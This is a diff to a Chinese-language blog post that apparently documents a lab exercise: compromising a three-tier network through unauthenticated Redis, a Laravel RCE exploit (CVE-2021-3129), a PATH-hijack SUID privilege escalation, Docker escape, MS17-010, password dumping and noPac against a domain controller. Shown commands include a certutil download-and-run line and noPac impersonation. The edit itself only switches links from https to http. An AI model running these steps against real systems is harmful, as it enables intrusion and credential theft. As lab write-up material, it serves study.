--- a/source/_posts/三层网络靶机打靶记录.md
+++ b/source/_posts/三层网络靶机打靶记录.md
@@ -32,7 +32,7 @@ tags: 靶场
 * Windows NetLogon 域内权限提升（CVE-2020-1472）漏洞利用
 * MS14-068漏洞利用(未利用成功)
 
-![靶机截图](https://image.3001.net/images/20210226/1614336174_6038d0ae97a56a0f1e287.png!small)
+![靶机截图](http://image.3001.net/images/20210226/1614336174_6038d0ae97a56a0f1e287.png!small)
 
 ### 过程
 
@@ -42,11 +42,11 @@ NMAP全端口扫描发现开放22、80、81、6379端口
 
 `nmap 192.168.0.106 -T4 -p-`
 
-![](https://cdn.laohuan.art/Snipaste_2022-01-30_12-47-54.png)
+![](http://qn.laohuan.xin/Snipaste_2022-01-30_12-47-54.png)
 
 其中81端口为Laravel的站点，后面不知道什么原因导致站点访问不了，不浪费时间排查原因，转向6379端口，发现redis未授权访问。
 
-<img src="https://cdn.laohuan.art/Snipaste_2022-01-30_14-54-51.png" style="zoom:67%;" />
+<img src="http://qn.laohuan.xin/Snipaste_2022-01-30_14-54-51.png" style="zoom:67%;" />
 
 redis写入公钥
 
@@ -62,11 +62,11 @@ save
 
 `ssh -i {私钥} 192.168.0.106`
 
-![](https://cdn.laohuan.art/Snipaste_2022-01-30_14-54-37.png)
+![](http://qn.laohuan.xin/Snipaste_2022-01-30_14-54-37.png)
 
 反弹shell上线到msf,添加路由和socks代理
 
-![](https://cdn.laohuan.art/Snipaste_2022-01-30_15-57-06.png)
+![](http://qn.laohuan.xin/Snipaste_2022-01-30_15-57-06.png)
 
 使用fscan发现192.168.52.30为通达OA系统且存在永恒之蓝，192.168.52.20又有一个Laravel的站点。(使用代理+fscan扫不出来东西，将fscan上传至web服务器扫描)
 
@@ -74,27 +74,27 @@ save
 
 `./fscan_amd64 -h 192.168.52.0/24`
 
-![](https://cdn.laohuan.art/Snipaste_2022-01-30_16-41-55.png)
+![](http://qn.laohuan.xin/Snipaste_2022-01-30_16-41-55.png)
 
 同时发现代理服务器配置，原来这台服务器只是作为反向代理服务器使用，而真正的web服务是开启在192.168.52.20那台机器。
 
-![](https://cdn.laohuan.art/Snipaste_2022-01-31_11-43-20.png)
+![](http://qn.laohuan.xin/Snipaste_2022-01-31_11-43-20.png)
 
 #### 2.Laravel站点
 
 发现192.168.52.0段有两台机器，一台为通达OA,一台为真正的Laravel站点，我们先拿下Laravel的站点。
 
- Laravel是一套简洁、开源的PHP Web开发框架，旨在实现Web软件的MVC架构。当Laravel开启了Debug模式时，由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用，攻击者可以通过发起恶意请求，构造恶意Log文件等方式触发Phar[反序列化](https://so.csdn.net/so/search?q=反序列化&spm=1001.2101.3001.7020)，最终造成远程代码执行。
+ Laravel是一套简洁、开源的PHP Web开发框架，旨在实现Web软件的MVC架构。当Laravel开启了Debug模式时，由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用，攻击者可以通过发起恶意请求，构造恶意Log文件等方式触发Phar[反序列化](http://so.csdn.net/so/search?q=反序列化&spm=1001.2101.3001.7020)，最终造成远程代码执行。
 
 使用POC拿下shell，使用代理直接打经常导致连接中断，遂将POC传到DMZ的web服务器打(使用哥斯拉2.x版本，3.x版本无法连接)
 
-[https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP](https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP)
+[http://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP](http://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP)
 
-![](https://cdn.laohuan.art/Snipaste_2022-01-30_17-08-30.png)
+![](http://qn.laohuan.xin/Snipaste_2022-01-30_17-08-30.png)
 
 成功连接
 
-![](https://cdn.laohuan.art/Snipaste_2022-01-30_17-49-48.png)
+![](http://qn.laohuan.xin/Snipaste_2022-01-30_17-49-48.png)
 
 发现权限较低，且多数命令不存在，检查发现为docker环境
 
@@ -102,21 +102,21 @@ save
 
 `ls -lh / .dockerenv`
 
-![](https://cdn.laohuan.art/Snipaste_2022-01-30_18-24-42.png)
+![](http://qn.laohuan.xin/Snipaste_2022-01-30_18-24-42.png)
 
 准备看看能不能docker逃逸，但逃逸之前得先把权限提到root
 
-使用提权脚本检查一下，[https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh),连续尝试了好几个都失败。
+使用提权脚本检查一下，[http://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh](http://github.com/mzet-/linux-exploit-suggester/blob/master/linux-exploit-suggester.sh),连续尝试了好几个都失败。
 
 `./linux-exploit-suggester.sh`
 
-![](https://cdn.laohuan.art/Snipaste_2022-01-30_18-38-23.png)
+![](http://qn.laohuan.xin/Snipaste_2022-01-30_18-38-23.png)
 
 使用suid提权，搜索设置了suid位的文件,发现jobs目录下有个shell文件
 
 `find / -perm -u=s -type f 2>/dev/null`
 
-![](https://cdn.laohuan.art/Snipaste_2022-01-30_20-31-37.png)
+![](http://qn.laohuan.xin/Snipaste_2022-01-30_20-31-37.png)
 
 发现这个shell文件实则是运行了ps命令，可通过修改环境变量，让其执行我们恶意的ps文件来拿到root权限
 
@@ -131,13 +131,13 @@ export PATH=/tmp:$PATH
 
 `./shell`
 
-![](https://cdn.laohuan.art/Snipaste_2022-01-30_20-44-51.png)
+![](http://qn.laohuan.xin/Snipaste_2022-01-30_20-44-51.png)
 
 python伪终端
 
 `python -c 'import pty;pty.spawn("/bin/bash")'`
 
-随后使用CDK进行docker逃逸，试了几个逃逸漏洞都没圆满逃逸成功，工具地址:[CDK](https://github.com/cdk-team/CDK/wiki/CDK-Home-CN)
+随后使用CDK进行docker逃逸，试了几个逃逸漏洞都没圆满逃逸成功，工具地址:[CDK](http://github.com/cdk-team/CDK/wiki/CDK-Home-CN)
 
 随后使用docker特权模式逃逸成功
 
@@ -155,11 +155,11 @@ python伪终端
 
 `chmod 600 root`
 
-![](https://cdn.laohuan.art/Snipaste_2022-02-03_11-48-16.png)
+![](http://qn.laohuan.xin/Snipaste_2022-02-03_11-48-16.png)
 
 成功拿下Laravel站点
 
-![](https://cdn.laohuan.art/Snipaste_2022-02-03_11-58-25.png)
+![](http://qn.laohuan.xin/Snipaste_2022-02-03_11-58-25.png)
 
 #### 3.通达OA
 
@@ -169,11 +169,11 @@ python伪终端
 
 `http://192.168.52.30:8080/inc/expired.php`
 
-![](https://cdn.laohuan.art/Snipaste_2022-02-03_14-42-12.png)
+![](http://qn.laohuan.xin/Snipaste_2022-02-03_14-42-12.png)
 
 直接使用exp获得shell
 
-![](https://cdn.laohuan.art/Snipaste_2022-02-03_14-46-58.png)
+![](http://qn.laohuan.xin/Snipaste_2022-02-03_14-46-58.png)
 
 使用msf生成正向shell可执行程序，上传到dmz的web服务器，并开启简单的http服务
 
@@ -181,15 +181,15 @@ python伪终端
 
 `certutil -urlcache -split -f http://192.168.52.10:8082/bind_53.exe && bind_53.exe`
 
-![](https://cdn.laohuan.art/Snipaste_2022-02-04_11-36-41.png)
+![](http://qn.laohuan.xin/Snipaste_2022-02-04_11-36-41.png)
 
 成功拿下OA服务器
 
-![](https://cdn.laohuan.art/Snipaste_2022-02-04_12-20-15.png)
+![](http://qn.laohuan.xin/Snipaste_2022-02-04_12-20-15.png)
 
 发现存在192.168.93.0/24段，添加路由并抓取密码
 
-![](https://cdn.laohuan.art/Snipaste_2022-02-05_13-30-26.png)
+![](http://qn.laohuan.xin/Snipaste_2022-02-05_13-30-26.png)
 
 #### 4.win7
 
@@ -197,17 +197,17 @@ python伪终端
 
 `net time /domain`
 
-![](https://cdn.laohuan.art/Snipaste_2022-02-05_12-09-57.png)
+![](http://qn.laohuan.xin/Snipaste_2022-02-05_12-09-57.png)
 
-![](https://cdn.laohuan.art/Snipaste_2022-02-04_13-21-29.png)
+![](http://qn.laohuan.xin/Snipaste_2022-02-04_13-21-29.png)
 
 使用ms17-010拿下win7
 
-![](https://cdn.laohuan.art/Snipaste_2022-02-05_12-49-20.png)
+![](http://qn.laohuan.xin/Snipaste_2022-02-05_12-49-20.png)
 
 抓取密码
 
-![](https://cdn.laohuan.art/Snipaste_2022-02-05_12-51-22.png)
+![](http://qn.laohuan.xin/Snipaste_2022-02-05_12-51-22.png)
 
 #### 5.域控
 
@@ -221,13 +221,13 @@ python伪终端
 
 `proxychains3 python3 scanner.py whoamianony.org/bunny:Bunny2021 -dc-ip 192.168.93.30 -use-ldap`
 
-![](https://cdn.laohuan.art/Snipaste_2022-02-05_15-00-07.png)
+![](http://qn.laohuan.xin/Snipaste_2022-02-05_15-00-07.png)
 
 存在漏洞，直接获取权限
 
 `proxychains3 python3 noPac.py whoamianony.org/bunny:Bunny2021 -dc-ip 192.168.93.30 -dc-host dc -shell --impersonate administrator -use-ldap`
 
-![](https://cdn.laohuan.art/Snipaste_2022-02-05_15-03-52.png)
+![](http://qn.laohuan.xin/Snipaste_2022-02-05_15-03-52.png)
 
 使用msf生成正向shell可执行程序，将其上传到内网web服务器，并关闭域控防护墙
 
@@ -239,10 +239,10 @@ python伪终端
 
 成功拿下域控
 
-![](https://cdn.laohuan.art/Snipaste_2022-02-05_15-45-03.png)
+![](http://qn.laohuan.xin/Snipaste_2022-02-05_15-45-03.png)
 
 ### 参考链接
 
-1. [https://www.freebuf.com/articles/network/264560.html](https://www.freebuf.com/articles/network/264560.html)
-2. [https://www.zyl.fit/archives/linux%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1%E4%B8%8D%E6%89%A7%E8%A1%8C](https://www.zyl.fit/archives/linux%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1%E4%B8%8D%E6%89%A7%E8%A1%8C)
-3. [https://blog.csdn.net/weixin_48300170/article/details/118890732](https://blog.csdn.net/weixin_48300170/article/details/118890732)
+1. [http://www.freebuf.com/articles/network/264560.html](http://www.freebuf.com/articles/network/264560.html)
+2. [http://www.zyl.fit/archives/linux%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1%E4%B8%8D%E6%89%A7%E8%A1%8C](http://www.zyl.fit/archives/linux%E5%AE%9A%E6%97%B6%E4%BB%BB%E5%8A%A1%E4%B8%8D%E6%89%A7%E8%A1%8C)
+3. [http://blog.csdn.net/weixin_48300170/article/details/118890732](http://blog.csdn.net/weixin_48300170/article/details/118890732)
